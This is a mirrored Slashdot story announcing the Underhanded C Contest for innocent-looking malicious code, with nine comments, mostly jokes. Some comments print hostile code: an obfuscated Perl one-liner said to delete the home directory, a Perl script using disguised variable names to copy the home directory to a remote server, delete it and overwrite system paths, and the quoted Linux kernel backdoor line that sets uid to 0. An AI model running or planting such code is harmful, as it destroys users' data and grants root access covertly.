Slashdot Mirror

← Back to Stories (view on slashdot.org)

The First Annual Underhanded C Contest

Posted by CowboyNeal on from the delightfully-malicious dept.

Xcott Craver writes "We have just announced a new annual contest, the Underhanded C Contest, to write clear, readable, innocent-looking C code that implements malicious behavior. The object is to hide evil functionality that survives visual inspection of the source. The prize is beer."

9 of 341 comments (clear)

  1. Comment removed by account_deleted · · Score: 5, Funny

    Comment removed based on user account deletion

  2. like this? by LiquidCoooled · · Score: 5, Funny

    #include stuff.h
    void main()
    {
    /* nothing / */ /* to see / * here */
    /* whats * / challenging / * about */
    /* this */ /* there / is no */ evil /*
    screensaver(); * function */ /* here
    anyone that thinks there is * / needs */
    /* their / * / eyes testing */ ();
    }

    585

    --
    liqbase :: faster than paper
  3. Here you go by titzandkunt · · Score: 5, Funny


    Just tuck it away in a commonly used header file, use touch to restore the last date/time of modification, and you're all set.

    #define void int

    Hours & hours of irritation & confusion!

    T&K.

    --
    Political language ... is designed to make lies sound truthful and murder respectable...
  4. Re:What are the legal ramifications of this? by bighoov · · Score: 5, Funny

    Can you even breathe in that tinfoil cocoon?

  5. Re:Seems a bit like those hacking contests by numbski · · Score: 5, Informative
    This is worse than the people that go around obfuscated perl. At least then you KNOW they're trying to hide something. I mean, you remember this?
    perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{~" -;;s;;$_;see'
    Don't run that. :P Unless you really don't like your home directory. I remember someone tore it down and dissected it, but the point is that if you can "hide it in broad daylight, then it is far more dangerous. :)

    I mean I could do something like this:

    # When do you want it done?
    $today="sudo";
    $yesterday="su -c";

    # Define our globals
    $superman="ls";
    $wonderwoman="rm"
    $batm an="cp";
    $aquaman="mv";

    #define some important flags
    $blows="-r";
    $maims="-p";
    $chunks="-f";
    $defeats="-s";

    #define some targets
    $your_mom="/";
    $your_dad="/usr";
    $your_ sister="~";
    $your_teacher="/bin";
    $hell="/dev/nu ll";
    $heaven="/dev/random";
    $skyhigh="nfs://myse rver/myhome";

    #....later, back at Superfriends Headquarters

    `$batman $blows $your_sister $skyhigh`;
    `$wonderwoman $blows $chunks $on $your_sister`;
    `$today $batman $and $your_mom $think $heaven $is $a $great $place $for $your_sister`;
    #Would you like to see the rest of the story?
    #print "Would you like to hear more? Please type your password to continue!";

    The superfriends save the day again.
    --

    Karma: Chameleon (mostly due to the fact that you come and go).

  6. Re:Why? by Nf1nk · · Score: 5, Insightful

    To find subtley malicous code in an open source project, we first must know what it looks like. Having contests like these creates a sample base of dangerous code and clever tricks to read and learn from.
    It is sort of like the computer version of a bomb squad.

    --
    I used to have a cool sig, back when I cared
  7. Subtlety by Dirtside · · Score: 5, Funny
    The prize is beer.
    ...but the beer is poisoned!
    --
    "Destroy science and religion. Science would re-emerge exactly the same; but not religion." - Penn Jillette, paraphrased
  8. how's this? by spongman · · Score: 5, Funny

    int main () { WinExec ("iexplore.exe"); }

  9. Linux Kernel Backdoor Attempt by Johnny+Hardcore · · Score: 5, Informative

    This reminds me about the attempt at inserting a backdoor in the linux kernel to gain root access. If they found out who did this, maybe he should get the free beer? ;)

    The attempt was trying to insert

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

    inside a function. Note that (current->uid = 0) is not testing but rather sets the UID to zero (and the surrounding brackets avoid the GCC warning).